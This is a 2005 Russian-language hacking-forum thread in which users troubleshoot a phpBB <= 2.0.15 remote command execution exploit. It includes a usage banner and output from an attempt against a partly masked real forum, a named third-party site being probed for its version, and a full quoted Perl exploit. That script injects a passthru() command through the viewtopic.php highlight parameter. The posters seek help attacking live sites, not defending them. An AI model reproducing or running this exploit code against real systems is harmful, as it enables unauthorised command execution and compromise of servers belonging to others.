ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #101  
Старый 03.08.2005, 16:11
Аватар для earnest
earnest
Новичок
Регистрация: 03.08.2005
Сообщений: 1
Провел на форуме:
6482

Репутация: 0
По умолчанию

phpBB <= 2.0.15 remote command execution exploit
by Captain Crunch Security TeaM // www.ccteam.ru or ccteam.nukleon.us
Thanks to nukleon, nori, r57. This programm just for fun! Coded by tristram.
################################################## ##########
Usage:

c99expl.phpbb2015-interactive.php [URL] [NUM] [CMD]
params:

[URL] - URL to directory where phpBB installed e.g. http://host.tld/phpBB/ or
http://host.tld/
[NUM] - number of existing topic (e.g. 10)
[CMD] - command for execute e.g. ls or "ls -la"
c99expm.phpbb2015.php http://host.tld/phpBB/ 10 ls
################################################## ##########
Enter URL: http://forum.****.lv
Enter Topic-ID: 2
Enter CMD: ls -la
Initialization exploit... OK
Processing parameters...
URL: http://forum.****.lv
HOST: forum.*****.lv
PATH:
PORT: 80
Topic-ID: 2
Execution "ls -la" result:
+%3Bls+-la%3B+echo+
bash $

помогите... почему у меня не выдает список? вроде экс. работает...
 
Ответить с цитированием

  #102  
Старый 04.08.2005, 12:59
Аватар для bogusz
bogusz
Новичок
Регистрация: 21.05.2005
Сообщений: 3
Провел на форуме:
1555

Репутация: 0
По умолчанию

Не подскажите точную версию...уже запарился перебирать =\
http://www.taultunleashed.com/phpbb2
 
Ответить с цитированием

  #103  
Старый 04.08.2005, 15:04
Аватар для GoRiLLa
GoRiLLa
Новичок
Регистрация: 14.07.2005
Сообщений: 23
Провел на форуме:
79902

Репутация: 1
По умолчанию

phpBB 2.0
The phpBB Group : 2002
 
Ответить с цитированием

  #104  
Старый 04.08.2005, 17:54
Аватар для bogusz
bogusz
Новичок
Регистрация: 21.05.2005
Сообщений: 3
Провел на форуме:
1555

Репутация: 0
По умолчанию

Цитата:
Сообщение от GoRiLLa  
phpBB 2.0
The phpBB Group : 2002
То что это 2.0 то я понял \=) вот какая это 2.0.*...13, 14, 15 , 16...вот в этом вопрос.
 
Ответить с цитированием

  #105  
Старый 04.08.2005, 18:41
Аватар для Loo
Loo
Новичок
Регистрация: 01.06.2005
Сообщений: 12
Провел на форуме:
20529

Репутация: 0
По умолчанию

bogusz
исходи из того, что версия до 2.0.3 =)
т.к. в 2002 году вышло только 2.0.0, 2.0.1, 2.0.2 и 2.0.3 =)
 
Ответить с цитированием

  #106  
Старый 10.08.2005, 20:19
Аватар для kamui
kamui
Новичок
Регистрация: 08.08.2005
Сообщений: 1
Провел на форуме:
15497

Репутация: 0
По умолчанию

Цитата:
Сообщение от Green_Bear  
по многочислеым просьбам трудящихся:

Код:
#!/usr/bin/perl

use IO::Socket;

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if (@ARGV < 4)
 {
 print q(############################################################
     phpBB <=2.0.15 remote command execution exploit
        by RusH security team // www.rst.void.ru
	Littttttttttle modificated by nori!
		r57 respect!
############################################################
 usage:
 
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
 params:
  [URL] - server url e.g. www.phpbb.com
  [DIR] - directory where phpBB installed e.g. /phpBB/ or /
  [NUM] - number of existing topic
  [CMD] - command for execute e.g. ls or "ls -la" 
############################################################
 );   
 exit;
 }

$serv  = $ARGV[0];
$dir   = $ARGV[1];
$topic = $ARGV[2];
$cmd   = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path  = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%27.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%27';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

$on = 0;

while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print "  $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

### EOF ###
все спасибо ввиде повышения репутации
дОБРОЕ ВРЕМЯ СУТОК!Не подскажите,в чем дело?
после ввода выдает:


*** CMD: [ [ls -la] ]
~~~~~~~~~~~~~~~~
[-] CONNECT FAILED
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Форумы 11 01.02.2007 12:21
Использование уязвимости в phpbb 2.0.15. Вопросы.. -artik- Форумы 8 28.08.2005 20:00
phpBB < 2.0.15, BBCODE URL в phpBB karapuz Форумы 21 17.06.2005 06:11
Вопрос про статью на античате о Уязвимости форумов IPB aX0en Форумы 2 16.12.2004 20:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ